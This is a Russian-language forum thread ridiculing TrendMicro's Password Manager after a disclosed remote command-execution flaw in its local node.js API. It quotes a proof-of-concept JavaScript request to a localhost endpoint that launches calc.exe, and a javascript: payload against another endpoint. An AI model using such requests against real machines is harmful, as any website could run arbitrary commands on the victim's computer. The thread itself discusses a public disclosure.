LINUX.ORG.RU
ФорумTalks

Наш антивирус позволяет более-лучше...

 , , ,


0

5

Цитата в переводе не нуждается:

When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.

http://www.trendmicro.com/us/home/products/software/password-manager/index.html

This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.

It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().

This means any website can launch arbitrary commands, like this:

x = new XMLHttpRequest() x.open(«GET», "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/c... true); try { x.send(); } catch (e) {};

Ты такой поставил Вин10 @ свистим, пердим, сливаем данные @ ставим антивирус @ безопасно-модно-молодежно %)

★★☆☆☆

Ну дык если пользователи ставят какой попало софт не заморачиваясь, то он и будет вырождаться, потому что нет смысла тогда писать нормальный софт.

goingUp ★★★★★ ()
x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

В голос.

CYB3R ★★★★★ ()
Последнее исправление: CYB3R (всего исправлений: 1)

Ты такой поставил Вин10 @ свистим, пердим, сливаем данные @ ставим антивирус @ безопасно-модно-молодежно %)

У меня проще, поставил из за жабы, которая душит, в стиме 90+ игр, за них деньги уплочены, вот изредка и играюсь в винде.

Да еще поставил killwin10. На всякий пожарный, но не критично.

Антивирус не ставил, сеть включаю в диспетчере устройств, для обновления игр.

А там, нехай стучит.

petyanamlt ★★★★ ()
Ответ на: комментарий от Unicode4all

ненужно
Sign in
Microsoft account What's this?

да уж. точнее не скажешь.

thunar ★★★★★ ()

Чем не нравится встроенный антивирус? Который бывший MS Security Essentials.

alman ★★★ ()
Ответ на: комментарий от Deleted

Я уже даже не знаю, что хуже: если это нарочно сделали или если сапожник без сапог.

anonymous_incognito ★★★★★ ()

Линк дай на исходную беседу: https://code.google.com/p/google-security-research/issues/detail?id=693

Не поленитесь и прочитайте всю нить до конца. Это такой цирк, что ни в какие ворота не лезет:

This thing is ridiculous, wtf is this:

https://localhost:49155/api/showSB?url=javascript:alert(topWindow.require(&qu...)

You were just hiding the global objects and invoking a browser shell...? ...and then calling it «Secure Browser»?!? The fact that you also run an old version with --disable-sandbox just adds insult to injury.

Жесть какая.

alex_the_v ★★★ ()

Там дальше ещё круче:

If I understand what it's doing, isRequestOriginAllowed() relies on the client-supplied Referer and Origin headers, which are trivially spoofable with any non-browser HTTP client like curl or wget. I don't see how it can be considered a valid patch to the vulnerability. Am I missing something?

Вот это да.

alex_the_v ★★★ ()

Ну, теперь я хотя бы узнал о существовании этого, кхем, антивируса.

Miguel ★★★★★ ()
Ответ на: комментарий от alex_the_v

#42 Yes, a patch has been issued so this bug is considered resolved.
Status: Fixed

Невероятно.

Okay, you proved they're clowns and don't care about their users.

Серьезно, спасибо за развлекуху, но теперь надо просто забить.

t184256 ★★★★★ ()

TrendMicro

Я один пользую Windows Defender да иногда гоняю AVZ в случае особой необход^Wпаранойи?

DeadEye ★★★★★ ()
Ответ на: комментарий от Unicode4all

Вин10
ставим антивирус

ненужно

Изображение "..." не может быть показано, так как содержит ошибки

Воистину ненужно!..

Sahas ★★★★★ ()

Феерично, разработкой ПО компьютерной безопасности занимаются люди которые в этом ничего не понимают. Сервер на node.js только один из косяков которые они сделали: http://www.extremetech.com/computing/220985-google-researcher-blasts-trendmic...

written in JavaScript with node.js

Мда, неудивительно что проги такие толстые стали :(

true_admin ★★★★★ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.